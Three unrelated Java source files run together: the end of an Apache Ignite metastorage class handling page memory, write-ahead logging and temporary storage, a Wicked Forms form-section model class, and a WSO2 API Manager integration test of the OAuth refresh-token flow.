idxTag = ((PageMemoryEx)dataRegion.pageMemory()).invalidate(METASTORAGE_CACHE_ID, PageIdAllocator.INDEX_PARTITION); PageStore store = ((FilePageStoreManager)cctx.pageStore()).getStore(METASTORAGE_CACHE_ID, PageIdAllocator.INDEX_PARTITION); store.truncate(idxTag); db.removeCheckpointListener(this); } /** {@inheritDoc} */ @Override public void beforeCheckpointBegin(Context ctx) { } }, dataRegion); } } } /** Frees the allocated resources. */ public void close() { if (tree != null) tree.close(); if (partStorage != null) partStorage.close(); } /** * Copying all data from the 'meta' to temporary storage. * * @return Target temporary storage */ private TmpStorage copyDataToTmpStorage() throws IgniteCheckedException { TmpStorage tmpStorage = new TmpStorage(TEMPORARY_METASTORAGE_IN_MEMORY_SIZE, log); GridCursor<MetastorageDataRow> cur = tree.find(null, null); while (cur.next()) { MetastorageDataRow row = cur.get(); tmpStorage.add(row.key(), partStorage.readRow(row.link())); } return tmpStorage; } /** * Data recovery from temporary storage * * @param tmpStorage temporary storage. */ private void restoreDataFromTmpStorage(TmpStorage tmpStorage) throws IgniteCheckedException { for (Iterator<IgniteBiTuple<String, byte[]>> it = tmpStorage.stream().iterator(); it.hasNext(); ) { IgniteBiTuple<String, byte[]> t = it.next(); writeRaw(t.get1(), t.get2()); } try { tmpStorage.close(); } catch (IOException e) { log.error(e.getMessage(), e); } } /** * @param db Database. */ private void initInternal(IgniteCacheDatabaseSharedManager db) throws IgniteCheckedException { if (PRESERVE_LEGACY_METASTORAGE_PARTITION_ID) getOrAllocateMetas(partId = OLD_METASTORE_PARTITION); else if (!readOnly || getOrAllocateMetas(partId = OLD_METASTORE_PARTITION)) getOrAllocateMetas(partId = METASTORE_PARTITION); if (!empty) { String freeListName = METASTORAGE_CACHE_NAME + "##FreeList"; String treeName = METASTORAGE_CACHE_NAME + "##Tree"; partStorage = new PartitionMetaStorageImpl<MetastorageRowStoreEntry>( METASTORAGE_CACHE_ID, freeListName, dataRegion, null, wal, reuseListRoot.pageId().pageId(), reuseListRoot.isAllocated(), cctx.diagnostic().pageLockTracker(), cctx.kernalContext(), null, FLAG_AUX ) { @Override protected long allocatePageNoReuse() throws IgniteCheckedException { return pageMem.allocatePage(grpId, partId, FLAG_AUX); } }; MetastorageRowStore rowStore = new MetastorageRowStore(partStorage, db); tree = new MetastorageTree( METASTORAGE_CACHE_ID, treeName, dataRegion.pageMemory(), wal, rmvId, partStorage, rowStore, treeRoot.pageId().pageId(), treeRoot.isAllocated(), cctx.kernalContext().failure(), cctx.diagnostic().pageLockTracker(), partId ); if (!readOnly) ((GridCacheDatabaseSharedManager)db).addCheckpointListener(this, dataRegion); } } /** {@inheritDoc} */ @Override public Serializable read(String key) throws IgniteCheckedException { byte[] data = readRaw(key); Serializable res = null; if (data != null) res = marshaller.unmarshal(data, U.gridClassLoader()); return res; } /** {@inheritDoc} */ @Override public void iterate( String keyPrefix, BiConsumer<String, ? super Serializable> cb, boolean unmarshal ) throws IgniteCheckedException { if (empty) return; Iterator<Map.Entry<String, byte[]>> updatesIter = null; if (readOnly) { if (lastUpdates != null) { SortedMap<String, byte[]> prefixedSubmap = lastUpdates.subMap(keyPrefix, keyPrefix + "\uFFFF"); if (!prefixedSubmap.isEmpty()) updatesIter = prefixedSubmap.entrySet().iterator(); } } Map.Entry<String, byte[]> curUpdatesEntry = null; if (updatesIter != null) { assert updatesIter.hasNext(); curUpdatesEntry = updatesIter.next(); } MetastorageSearchRow lower = new MetastorageSearchRow(keyPrefix); MetastorageSearchRow upper = new MetastorageSearchRow(keyPrefix + "\uFFFF"); GridCursor<MetastorageDataRow> cur = tree.find(lower, upper); while (cur.next()) { MetastorageDataRow row = cur.get(); String key = row.key(); byte[] valBytes = partStorage.readRow(row.link()); int c = 0; while (curUpdatesEntry != null && (c = curUpdatesEntry.getKey().compareTo(key)) < 0) curUpdatesEntry = advanceCurrentUpdatesEntry(cb, unmarshal, updatesIter, curUpdatesEntry); if (curUpdatesEntry != null && c == 0) curUpdatesEntry = advanceCurrentUpdatesEntry(cb, unmarshal, updatesIter, curUpdatesEntry); else applyCallback(cb, unmarshal, key, valBytes); } while (curUpdatesEntry != null) curUpdatesEntry = advanceCurrentUpdatesEntry(cb, unmarshal, updatesIter, curUpdatesEntry); } /** */ private Map.Entry<String, byte[]> advanceCurrentUpdatesEntry( BiConsumer<String, ? super Serializable> cb, boolean unmarshal, Iterator<Map.Entry<String, byte[]>> updatesIter, Map.Entry<String, byte[]> curUpdatesEntry ) throws IgniteCheckedException { applyCallback(cb, unmarshal, curUpdatesEntry.getKey(), curUpdatesEntry.getValue()); return updatesIter.hasNext() ? updatesIter.next() : null; } /** */ private void applyCallback( BiConsumer<String, ? super Serializable> cb, boolean unmarshal, String key, byte[] valBytes ) throws IgniteCheckedException { if (valBytes != TOMBSTONE) { if (unmarshal) { Serializable val = marshaller.unmarshal(valBytes, U.gridClassLoader()); cb.accept(key, val); } else cb.accept(key, valBytes); } } /** {@inheritDoc} */ @Override public void write(@NotNull String key, @NotNull Serializable val) throws IgniteCheckedException { assert val != null; if (!readOnly) writeRaw(key, marshaller.marshal(val)); } /** {@inheritDoc} */ @Override public void remove(@NotNull String key) throws IgniteCheckedException { removeData(key); } /** {@inheritDoc} */ @Override public void writeRaw(String key, byte[] data) throws IgniteCheckedException { if (!readOnly) { WALPointer ptr; synchronized (this) { ptr = wal.log(new MetastoreDataRecord(key, data)); MetastorageDataRow oldRow = tree.findOne(new MetastorageSearchRow(key)); byte[] keyBytes = key.getBytes(); long keyLink; if (oldRow != null) keyLink = oldRow.keyLink(); else if (keyBytes.length > MetastorageTree.MAX_KEY_LEN) keyLink = tree.rowStore().addRow(keyBytes); else keyLink = 0L; long dataLink = tree.rowStore().addRow(data); tree.put(new MetastorageDataRow(dataLink, key, keyLink)); if (oldRow != null) tree.rowStore().removeRow(oldRow.link()); } wal.flush(ptr, false); } } /** {@inheritDoc} */ @Override public byte[] readRaw(String key) throws IgniteCheckedException { if (readOnly) { if (lastUpdates != null) { byte[] res = lastUpdates.get(key); if (res != null) return res != TOMBSTONE ? res : null; } if (empty) return null; } MetastorageDataRow row = tree.findOne(new MetastorageSearchRow(key)); if (row == null) return null; return partStorage.readRow(row.link()); } /** */ public void removeData(String key) throws IgniteCheckedException { if (!readOnly) { WALPointer ptr; synchronized (this) { MetastorageDataRow oldRow = tree.findOne(new MetastorageSearchRow(key)); if (oldRow == null) return; ptr = wal.log(new MetastoreDataRecord(key, null)); tree.removex(oldRow); tree.rowStore().removeRow(oldRow.link()); if (oldRow.keyLink() != 0L) tree.rowStore().removeRow(oldRow.keyLink()); } wal.flush(ptr, false); } } /** */ private void checkRootsPageIdFlag(long treeRoot, long reuseListRoot) throws StorageException { if (PageIdUtils.flag(treeRoot) != FLAG_AUX && PageIdUtils.flag(treeRoot) != FLAG_DATA) throw new StorageException("Wrong tree root page id flag: treeRoot=" + U.hexLong(treeRoot) + ", METASTORAGE_CACHE_ID=" + METASTORAGE_CACHE_ID); if (PageIdUtils.flag(reuseListRoot) != FLAG_AUX && PageIdUtils.flag(reuseListRoot) != FLAG_DATA) throw new StorageException("Wrong reuse list root page id flag: reuseListRoot=" + U.hexLong(reuseListRoot) + ", METASTORAGE_CACHE_ID=" + METASTORAGE_CACHE_ID); } /** * Initializing the selected partition for use as MetaStorage * * @param partId Partition id. * @return true if the partion is empty */ private boolean getOrAllocateMetas(int partId) throws IgniteCheckedException { empty = false; PageMemoryEx pageMem = (PageMemoryEx)dataRegion.pageMemory(); long partMetaId = pageMem.partitionMetaPageId(METASTORAGE_CACHE_ID, partId); long partMetaPage = pageMem.acquirePage(METASTORAGE_CACHE_ID, partMetaId); try { if (readOnly) { long pageAddr = pageMem.readLock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage); try { if (PageIO.getType(pageAddr) != PageIO.T_PART_META) { empty = true; return true; } PagePartitionMetaIO io = PageIO.getPageIO(pageAddr); long treeRoot = io.getTreeRoot(pageAddr); long reuseListRoot = io.getReuseListRoot(pageAddr); checkRootsPageIdFlag(treeRoot, reuseListRoot); this.treeRoot = new RootPage(new FullPageId(treeRoot, METASTORAGE_CACHE_ID), false); this.reuseListRoot = new RootPage(new FullPageId(reuseListRoot, METASTORAGE_CACHE_ID), false); rmvId.set(io.getGlobalRemoveId(pageAddr)); } finally { pageMem.readUnlock(METASTORAGE_CACHE_ID, partId, partMetaPage); } } else { boolean allocated = false; long pageAddr = pageMem.writeLock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage); try { long treeRoot, reuseListRoot; if (PageIO.getType(pageAddr) != PageIO.T_PART_META) { // Initialize new page. PagePartitionMetaIO io = PagePartitionMetaIO.VERSIONS.latest(); PageMetrics metrics = pageMem.metrics().cacheGrpPageMetrics(METASTORAGE_CACHE_ID); //MetaStorage never encrypted so realPageSize == pageSize. io.initNewPage(pageAddr, partMetaId, pageMem.pageSize(), metrics); treeRoot = pageMem.allocatePage(METASTORAGE_CACHE_ID, partId, FLAG_AUX); reuseListRoot = pageMem.allocatePage(METASTORAGE_CACHE_ID, partId, FLAG_AUX); assert PageIdUtils.flag(treeRoot) == FLAG_AUX; assert PageIdUtils.flag(reuseListRoot) == FLAG_AUX; io.setTreeRoot(pageAddr, treeRoot); io.setReuseListRoot(pageAddr, reuseListRoot); if (PageHandler.isWalDeltaRecordNeeded(pageMem, METASTORAGE_CACHE_ID, partMetaId, partMetaPage, wal, null)) { assert io.getType() == PageIO.T_PART_META; wal.log(new MetaPageInitRecord( METASTORAGE_CACHE_ID, partMetaId, io.getType(), io.getVersion(), treeRoot, reuseListRoot )); } allocated = true; } else { PagePartitionMetaIO io = PageIO.getPageIO(pageAddr); treeRoot = io.getTreeRoot(pageAddr); reuseListRoot = io.getReuseListRoot(pageAddr); rmvId.set(io.getGlobalRemoveId(pageAddr)); checkRootsPageIdFlag(treeRoot, reuseListRoot); } this.treeRoot = new RootPage(new FullPageId(treeRoot, METASTORAGE_CACHE_ID), allocated); this.reuseListRoot = new RootPage(new FullPageId(reuseListRoot, METASTORAGE_CACHE_ID), allocated); } finally { pageMem.writeUnlock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage, null, allocated); } } } finally { pageMem.releasePage(METASTORAGE_CACHE_ID, partMetaId, partMetaPage); } return false; } /** * @return Page memory. */ public PageMemory pageMemory() { return dataRegion.pageMemory(); } /** {@inheritDoc} */ @Override public void onMarkCheckpointBegin(Context ctx) throws IgniteCheckedException { Executor executor = ctx.executor(); if (executor == null) { partStorage.saveMetadata(IoStatisticsHolderNoOp.INSTANCE); saveStoreMetadata(); } else { executor.execute(() -> { try { partStorage.saveMetadata(IoStatisticsHolderNoOp.INSTANCE); } catch (IgniteCheckedException e) { throw new IgniteException(e); } }); executor.execute(() -> { try { saveStoreMetadata(); } catch (IgniteCheckedException e) { throw new IgniteException(e); } }); } } /** {@inheritDoc} */ @Override public void beforeCheckpointBegin(Context ctx) throws IgniteCheckedException { partStorage.saveMetadata(IoStatisticsHolderNoOp.INSTANCE); } /** {@inheritDoc} */ @Override public void onCheckpointBegin(Context ctx) throws IgniteCheckedException { /* No-op. */ } /** * @throws IgniteCheckedException If failed. */ private void saveStoreMetadata() throws IgniteCheckedException { PageMemoryEx pageMem = (PageMemoryEx)pageMemory(); long partMetaId = pageMem.partitionMetaPageId(METASTORAGE_CACHE_ID, partId); long partMetaPage = pageMem.acquirePage(METASTORAGE_CACHE_ID, partMetaId); try { long partMetaPageAddr = pageMem.writeLock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage); if (partMetaPageAddr == 0L) { U.warn(log, "Failed to acquire write lock for meta page [metaPage=" + partMetaPage + ']'); return; } boolean changed = false; try { PagePartitionMetaIO io = PageIO.getPageIO(partMetaPageAddr); changed |= io.setGlobalRemoveId(partMetaPageAddr, rmvId.get()); } finally { pageMem.writeUnlock(METASTORAGE_CACHE_ID, partMetaId, partMetaPage, null, changed); } } finally { pageMem.releasePage(METASTORAGE_CACHE_ID, partMetaId, partMetaPage); } } /** */ public void applyUpdate(String key, byte[] value) throws IgniteCheckedException { if (readOnly) { if (lastUpdates == null) lastUpdates = new TreeMap<>(); lastUpdates.put(key, value != null ? value : TOMBSTONE); } else { if (value != null) writeRaw(key, value); else removeData(key); } } /** */ public Marshaller marshaller() { return marshaller; } /** * Temporary storage internal */ private interface TmpStorageInternal extends Closeable { /** * Put data * * @param key Key. * @param val Value. */ boolean add(String key, byte[] val) throws IOException; /** * Read data from storage */ Stream<IgniteBiTuple<String, byte[]>> stream() throws IOException; } /** * Temporary storage (memory) */ private static class MemoryTmpStorage implements TmpStorageInternal { /** Buffer. */ final ByteBuffer buf; /** Size. */ int size; /** * @param size Size. */ MemoryTmpStorage(int size) { buf = ByteBuffer.allocateDirect(size); } /** {@inheritDoc} */ @Override public boolean add(String key, byte[] val) { byte[] keyData = key.getBytes(StandardCharsets.UTF_8); if (val.length + keyData.length + 8 > buf.remaining()) return false; buf.putInt(keyData.length).putInt(val.length).put(keyData).put(val); size++; return true; } /** {@inheritDoc} */ @Override public Stream<IgniteBiTuple<String, byte[]>> stream() { buf.flip(); return Stream.generate(() -> { int keyLen = buf.getInt(); int dataLen = buf.getInt(); byte[] tmpBuf = new byte[Math.max(keyLen, dataLen)]; buf.get(tmpBuf, 0, keyLen); String key = new String(tmpBuf, 0, keyLen, StandardCharsets.UTF_8); buf.get(tmpBuf, 0, dataLen); return new IgniteBiTuple<>(key, tmpBuf.length > dataLen ? Arrays.copyOf(tmpBuf, dataLen) : tmpBuf); }).limit(size); } /** {@inheritDoc} */ @Override public void close() throws IOException { } } /** * Temporary storage (file) */ private static class FileTmpStorage implements TmpStorageInternal { /** Cache. */ final ByteBuffer cache = ByteBuffer.allocateDirect(TEMPORARY_METASTORAGE_BUFFER_SIZE); /** File. */ RandomAccessFile file; /** Size. */ long size; /** {@inheritDoc} */ @Override public boolean add(String key, byte[] val) throws IOException { if (file == null) file = new RandomAccessFile(File.createTempFile("m_storage", "bin"), "rw"); byte[] keyData = key.getBytes(StandardCharsets.UTF_8); if (val.length + keyData.length + 8 > cache.remaining()) flushCache(false); cache.putInt(keyData.length).putInt(val.length).put(keyData).put(val); size++; return true; } /** {@inheritDoc} */ @Override public Stream<IgniteBiTuple<String, byte[]>> stream() throws IOException { if (file == null) return Stream.empty(); flushCache(true); file.getChannel().position(0); readToCache(); return Stream.generate(() -> { if (cache.remaining() <= 8) { cache.compact(); try { readToCache(); } catch (IOException e) { throw new IgniteException(e); } } int keyLen = cache.getInt(); int dataLen = cache.getInt(); if (cache.remaining() < keyLen + dataLen) { cache.compact(); try { readToCache(); } catch (IOException e) { throw new IgniteException(e); } } byte[] tmpBuf = new byte[Math.max(keyLen, dataLen)]; cache.get(tmpBuf, 0, keyLen); String key = new String(tmpBuf, 0, keyLen, StandardCharsets.UTF_8); cache.get(tmpBuf, 0, dataLen); return new IgniteBiTuple<>(key, tmpBuf.length > dataLen ? Arrays.copyOf(tmpBuf, dataLen) : tmpBuf); }).limit(size); } /** {@inheritDoc} */ @Override public void close() throws IOException { file.close(); } /** * Read data to cache */ private void readToCache() throws IOException { int len = (int)Math.min(file.length() - file.getChannel().position(), cache.remaining()); while (len > 0) len -= file.getChannel().read(cache); cache.flip(); } /** * Write cache to file. * * @param force force metadata. */ private void flushCache(boolean force) throws IOException { if (cache.position() > 0) { cache.flip(); while (cache.remaining() > 0) file.getChannel().write(cache); cache.clear(); } file.getChannel().force(force); } } /** * Temporary storage */ public static class TmpStorage implements Closeable { /** Chain of internal storages. */ final List<TmpStorageInternal> chain = new ArrayList<>(2); /** Current internal storage. */ TmpStorageInternal current; /** Logger. */ final IgniteLogger log; /** * @param memBufSize Memory buffer size. * @param log Logger. */ TmpStorage(int memBufSize, IgniteLogger log) { this.log = log; chain.add(current = new MemoryTmpStorage(memBufSize)); } /** * Put data * * @param key Key. * @param val Value. */ public void add(String key, byte[] val) throws IgniteCheckedException { try { while (!current.add(key, val)) chain.add(current = new FileTmpStorage()); } catch (IOException e) { throw new IgniteCheckedException(e); } } /** * Read data from storage */ public Stream<IgniteBiTuple<String, byte[]>> stream() { return chain.stream().flatMap(storage -> { try { return storage.stream(); } catch (IOException e) { throw new IgniteException(e); } }); } /** {@inheritDoc} */ @Override public void close() throws IOException { for (TmpStorageInternal storage : chain) { try { storage.close(); } catch (IOException ex) { log.error(ex.getMessage(), ex); } } } } }
/** * Copyright 2013 Wicked Forms (https://github.com/thombergs/wicked-forms) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package de.adesso.wickedforms.model; import org.apache.commons.lang.builder.ToStringBuilder; import org.apache.commons.lang.builder.ToStringStyle; import de.adesso.wickedforms.model.elements.AbstractFormElement; import java.util.ArrayList; import java.util.Collections; import java.util.List; /** * A section of a dynamic form. With sections, multiple form elements that * belong together can be combined. * <p/> * A Wicked Forms interpreter should display a section in a way that makes it * visible to the user that the contained form elements belong together. * * @author Tom Hombergs (tom.hombergs@gmail.com) * */ public class Section extends AbstractFormElement { private String label; private final List<AbstractFormElement> formElements = new ArrayList<AbstractFormElement>(); private boolean hidden = false; private boolean showRemoveButton = false; /** * Constructor. * * @param label * the title of the form. This title should be displayed * prominently by a Wicked Forms interpreter. */ public Section(final String label) { this.label = label; } /** * Constructs a hidden section (i.e. without title and without visual * border. */ public Section() { this.hidden = true; } /** * Sets the title of this section. * * @param label * the new title. * @return this object for chaining */ public Section setLabel(final String label) { this.label = label; return this; } public String getTitle() { return this.label; } /** * Adds a form element to the end of this section. * * @param element * the element to add. * @return this object for chaining */ public Section add(final AbstractFormElement element) { element.setIndex(this.formElements.size()); element.setParentSection(this); this.formElements.add(element); return this; } public Section remove(final AbstractFormElement elementToRemove) { if (this.formElements.remove(elementToRemove)) { elementToRemove.setParentSection(null); // shift the index of all form elements behind the new one by one for (AbstractFormElement element : this.formElements) { if (element.getIndex() > elementToRemove.getIndex()) { element.setIndex(element.getIndex() - 1); } } } return this; } /** * Inserts a new element before another element. * <p/> * Internal note: the element is actually added into the formElements list * as the last item! The newly added form element and all elements behind it * will merely have {@link AbstractFormElement#setIndex(Integer)} * called with the according index. This is due to the fact that frameworks * working on the formElements List may access the elements by List index * and may thus be unable to work with elements shifting within the List. * * @param newElement * the new element to insert * @param beforeThis * the element before which to insert the new element * @throws IllegalArgumentException * if the element before which to insert is not found in this * section. * @return this object for chaining */ public Section insertBefore(final AbstractFormElement newElement, final AbstractFormElement beforeThis) { int index = beforeThis.getIndex(); if (index == -1) { throw new IllegalArgumentException( "this section dos not contain the form element before which to insert the new element!"); } // shift the index of all form elements behind the new one by one for (AbstractFormElement element : this.formElements) { if (element.getIndex() >= index) { element.setIndex(element.getIndex() + 1); } } newElement.setParentSection(this); newElement.setIndex(index); this.formElements.add(newElement); return this; } /** * Retrieves all form elements currently contained in this section. * <p/> * Note that the returned list is not necessarily sorted by the index of the * contained form elements! To have them sorted, use a comparator that sorts * by {@link AbstractFormElement#getIndex()}. * * @return the form elements. */ public List<AbstractFormElement> getFormElements() { return Collections.unmodifiableList(this.formElements); } public Section setHidden(final boolean hidden) { this.hidden = hidden; return this; } public boolean isHidden() { return this.hidden; } /** * Assigns each form element that is part of this section a unique id if it * does not have an id yet. * * @param startValue * the ID to start with * @return the last ID that was assigned */ protected int assignIds(int startValue) { setId("" + startValue++); for (AbstractFormElement formElement : this.getFormElements()) { if (formElement instanceof Section) { startValue = ((Section) formElement).assignIds(startValue++); } else if (formElement.getId() == null || "".equals(formElement.getId())) { formElement.setId("" + startValue++); } } return startValue; } @Override public String toString() { return ToStringBuilder.reflectionToString(this, ToStringStyle.MULTI_LINE_STYLE); } /** * Sets whether a "remove" button should be displayed for this section. * * @return this object for chaining */ public Section setShowRemoveButton(boolean showRemoveButton) { this.showRemoveButton = showRemoveButton; return this; } /** * Determines if a "remove" button should be displayed for this section. * * @return */ public boolean isShowRemoveButton() { return this.showRemoveButton; } /** * recursive search through the forms sections/elements for the given id * * @param id * like the given id in the XML-form * @return returns the formelement representing with the given id */ public AbstractFormElement getElementById(String id) { AbstractFormElement element = null; // this element is the searched one if (getId().equals(id)) { return this; } else { for (AbstractFormElement formElement : formElements) { // the child element is the searched one if (formElement.getId().equals(id)) { return formElement; } // search in child-elements if (formElement instanceof Section) { element = ((Section) formElement).getElementById(id); if (element != null) return element; } } } // no element found return null; } }
/* *Copyright (c) 2015, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * *WSO2 Inc. licenses this file to you under the Apache License, *Version 2.0 (the "License"); you may not use this file except *in compliance with the License. *You may obtain a copy of the License at * *http://www.apache.org/licenses/LICENSE-2.0 * *Unless required by applicable law or agreed to in writing, *software distributed under the License is distributed on an *"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY *KIND, either express or implied. See the License for the *specific language governing permissions and limitations *under the License. */ package org.wso2.am.integration.tests.token; import org.apache.commons.lang.StringUtils; import org.json.JSONObject; import org.testng.annotations.AfterClass; import org.testng.annotations.BeforeClass; import org.testng.annotations.DataProvider; import org.testng.annotations.Factory; import org.testng.annotations.Test; import org.wso2.am.integration.test.utils.base.APIMIntegrationBaseTest; import org.wso2.am.integration.test.utils.base.APIMIntegrationConstants; import org.wso2.am.integration.test.utils.bean.APILifeCycleState; import org.wso2.am.integration.test.utils.bean.APILifeCycleStateRequest; import org.wso2.am.integration.test.utils.bean.APIRequest; import org.wso2.am.integration.test.utils.bean.APPKeyRequestGenerator; import org.wso2.am.integration.test.utils.bean.SubscriptionRequest; import org.wso2.am.integration.test.utils.clients.APIPublisherRestClient; import org.wso2.am.integration.test.utils.clients.APIStoreRestClient; import org.wso2.am.integration.test.utils.generic.APIMTestCaseUtils; import org.wso2.carbon.automation.engine.annotations.ExecutionEnvironment; import org.wso2.carbon.automation.engine.annotations.SetEnvironment; import org.wso2.carbon.automation.engine.context.AutomationContext; import org.wso2.carbon.automation.engine.context.TestUserMode; import org.wso2.carbon.automation.test.utils.http.client.HttpRequestUtil; import org.wso2.carbon.automation.test.utils.http.client.HttpResponse; import org.wso2.carbon.integration.common.utils.mgt.ServerConfigurationManager; import javax.ws.rs.core.Response; import java.net.URL; import java.util.HashMap; import java.util.Map; import static org.testng.Assert.assertEquals; import static org.testng.Assert.assertFalse; import static org.testng.Assert.assertTrue; @SetEnvironment(executionEnvironments = {ExecutionEnvironment.STANDALONE}) public class RefreshTokenTestCase extends APIMIntegrationBaseTest { private APIPublisherRestClient apiPublisher; private APIStoreRestClient apiStore; private ServerConfigurationManager serverConfigurationManager; private static String backEndEndpointUrl; private static final String APPLICATION_NAME = "RefreshTokenTestAPI-Application"; @Factory(dataProvider = "userModeDataProvider") public RefreshTokenTestCase(TestUserMode userMode) { this.userMode = userMode; } @DataProvider public static Object[][] userModeDataProvider() { return new Object[][]{ new Object[]{TestUserMode.SUPER_TENANT_ADMIN}, new Object[]{TestUserMode.TENANT_ADMIN}, }; } @BeforeClass(alwaysRun = true) public void setEnvironment() throws Exception { super.init(userMode); /* If test run in external distributed deployment you need to copy following resources accordingly. configFiles/hostobjecttest/api-manager.xml configFiles/tokenTest/log4j.properties */ // serverConfigurationManager.applyConfiguration( // new File(getAMResourceLocation() + File.separator + "configFiles" + File.separator + // "tokenTest" + File.separator + "api-manager.xml")); // serverConfigurationManager.applyConfiguration( // new File(getAMResourceLocation() + File.separator + "configFiles" + File.separator + // "tokenTest" + File.separator + "log4j.properties")); backEndEndpointUrl = getGatewayURLHttp() + "jaxrs_basic/services/customers/customerservice"; serverConfigurationManager = new ServerConfigurationManager( new AutomationContext(APIMIntegrationConstants.AM_PRODUCT_GROUP_NAME, APIMIntegrationConstants.AM_GATEWAY_WRK_INSTANCE, TestUserMode.SUPER_TENANT_ADMIN)); String publisherURLHttp = publisherUrls.getWebAppURLHttp(); String storeURLHttp = storeUrls.getWebAppURLHttp(); apiPublisher = new APIPublisherRestClient(publisherURLHttp); apiStore = new APIStoreRestClient(storeURLHttp); } @Test(groups = {"wso2.am"}, description = "Test Refresh token functionality") public void testRefreshTokenAPITestCase() throws Exception { String apiName = "RefreshTokenTestAPI"; String apiContext = "refreshTokenTestAPI"; String tags = "sample, token, media"; String description = "This is test API create by API manager integration test"; String apiVersion = "1.0.0"; //Login to publisher apiPublisher.login(publisherContext.getContextTenant().getContextUser().getUserName(), publisherContext.getContextTenant().getContextUser().getPassword()); //Create API. APIRequest apiRequest = new APIRequest(apiName, apiContext, new URL(backEndEndpointUrl)); apiRequest.setTags(tags); apiRequest.setDescription(description); apiRequest.setVersion(apiVersion); apiRequest.setSandbox(backEndEndpointUrl); apiRequest.setProvider(user.getUserName()); apiPublisher.addAPI(apiRequest); //Publish API. APILifeCycleStateRequest updateRequest = new APILifeCycleStateRequest(apiName, user.getUserName(), APILifeCycleState.PUBLISHED); apiPublisher.changeAPILifeCycleStatus(updateRequest); //Login to Store. apiStore.login(storeContext.getContextTenant().getContextUser().getUserName(), storeContext.getContextTenant().getContextUser().getPassword()); //Add Application. apiStore.addApplication(APPLICATION_NAME, APIMIntegrationConstants.APPLICATION_TIER.LARGE, "", "this-is-test"); //Subscribe Application to API. SubscriptionRequest subscriptionRequest = new SubscriptionRequest(apiName, storeContext.getContextTenant() .getContextUser() .getUserName()); subscriptionRequest.setTier(APIMIntegrationConstants.API_TIER.GOLD); subscriptionRequest.setApplicationName(APPLICATION_NAME); apiStore.subscribe(subscriptionRequest); //Get Consumer Key and Consumer Secret//Generate production token and invoke with that APPKeyRequestGenerator generateAppKeyRequest = new APPKeyRequestGenerator(APPLICATION_NAME); String responseString = apiStore.generateApplicationKey(generateAppKeyRequest).getData(); JSONObject response = new JSONObject(responseString); // get Consumer Key and Consumer Secret String consumerKey = response.getJSONObject("data").getJSONObject("key").getString("consumerKey"); String consumerSecret = response.getJSONObject("data").getJSONObject("key").getString("consumerSecret"); URL tokenEndpointURL = new URL(getGatewayURLNhttp() + "token"); //Get an Access Token from the user who is logged into the API Store. See APIMANAGER-3152. String subsAccessTokenPayload = APIMTestCaseUtils.getPayloadForPasswordGrant( storeContext.getContextTenant().getContextUser().getUserName(), storeContext.getContextTenant().getContextUser().getPassword()); JSONObject subsAccessTokenGenerationResponse = new JSONObject( apiStore.generateUserAccessKey(consumerKey, consumerSecret, subsAccessTokenPayload, tokenEndpointURL).getData()); String subsRefreshToken = subsAccessTokenGenerationResponse.getString("refresh_token"); assertFalse(StringUtils.isEmpty(subsRefreshToken), "Refresh token of access token generated by subscriber is empty"); //Obtain user access token String requestBody = APIMTestCaseUtils.getPayloadForPasswordGrant(user.getUserName(), user.getPassword()); JSONObject accessTokenGenerationResponse = new JSONObject( apiStore.generateUserAccessKey(consumerKey, consumerSecret, requestBody, tokenEndpointURL).getData()); // get Access Token and Refresh Token String userAccessToken = accessTokenGenerationResponse.getString("access_token"); String refreshToken = accessTokenGenerationResponse.getString("refresh_token"); Map<String, String> requestHeaders = new HashMap<String, String>(); //Check Access Token requestHeaders.put("Authorization", "Bearer " + userAccessToken); requestHeaders.put("accept", "text/xml"); String apiUrl = getAPIInvocationURLHttp("refreshTokenTestAPI/1.0.0/customers/123"); HttpResponse httpResponse = HttpRequestUtil.doGet(apiUrl, requestHeaders); //TODO - Remove the second request below. This is a temporary workaround to avoid the issue caused by a bug in // carbon-mediation 4.4.11-SNAPSHOT See the thread "[Dev] [ESB] EmptyStackException when resuming a paused // message processor" on dev@wso2.org for information about the bug. Thread.sleep(5000); httpResponse = HttpRequestUtil.doGet(apiUrl, requestHeaders); assertEquals(httpResponse.getResponseCode(), Response.Status.OK.getStatusCode(), "Response code mismatched"); assertTrue(httpResponse.getData().contains("John"), "Response data mismatched"); assertTrue(httpResponse.getData().contains("<name>"), "Response data mismatched"); assertTrue(httpResponse.getData().contains("<Customer>"), "Response data mismatched"); //Get a new access token using refresh token String getAccessTokenFromRefreshTokenRequestBody = "grant_type=refresh_token&refresh_token=" + refreshToken + "&scope=PRODUCTION"; accessTokenGenerationResponse = new JSONObject( apiStore.generateUserAccessKey(consumerKey, consumerSecret, getAccessTokenFromRefreshTokenRequestBody, tokenEndpointURL).getData()); userAccessToken = accessTokenGenerationResponse.getString("access_token"); requestHeaders = new HashMap<String, String>(); //Check with new Access Token requestHeaders.put("Authorization", "Bearer " + userAccessToken); requestHeaders.put("accept", "text/xml"); httpResponse = HttpRequestUtil.doGet(apiUrl, requestHeaders); assertEquals(httpResponse.getResponseCode(), Response.Status.OK.getStatusCode(), "Response code mismatched"); assertTrue(httpResponse.getData().contains("John"), "Response data mismatched"); assertTrue(httpResponse.getData().contains("<name"), "Response data mismatched"); assertTrue(httpResponse.getData().contains("<Customer>"), "Response data mismatched"); } @AfterClass(alwaysRun = true) public void destroy() throws Exception { apiStore.removeApplication(APPLICATION_NAME); super.cleanUp(); } }
